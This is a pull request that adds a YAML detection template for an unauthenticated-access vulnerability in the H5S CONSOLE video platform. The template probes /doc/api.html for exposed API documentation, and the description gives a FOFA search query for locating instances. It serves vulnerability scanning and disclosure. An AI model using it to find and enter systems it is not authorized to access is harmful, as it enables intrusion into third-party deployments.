### PR TITLE
poc-yaml-h5s-console-unauth

### DIFF
--- a/pocs/poc-yaml-h5s-console-unauth.yml
+++ b/pocs/poc-yaml-h5s-console-unauth.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-h5s-console-unauth
+manual: true
+transport: http
+rules:
+    meta0:
+        request:
+            cache: true
+            method: GET
+            path: /doc/api.html
+        expression: response.status == 200 && (response.body.bcontains(b'apiName":"GetCodecInfo') || response.body.bcontains(b"<title>H5S视频平台 - API文档"))
+expression: meta0()
+detail:
+    author: fengyang(https://github.com/bigDevi1)
+    links:
+        - https://t.zsxq.com/Yfaa6qV
+    description: 零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞
## 测试环境
fofa:title=="H5S CONSOLE"
## 备注
![image](https://user-images.githubusercontent.com/35722040/142819231-ddcb678a-33fb-4c07-9539-9abf156c78ad.png)
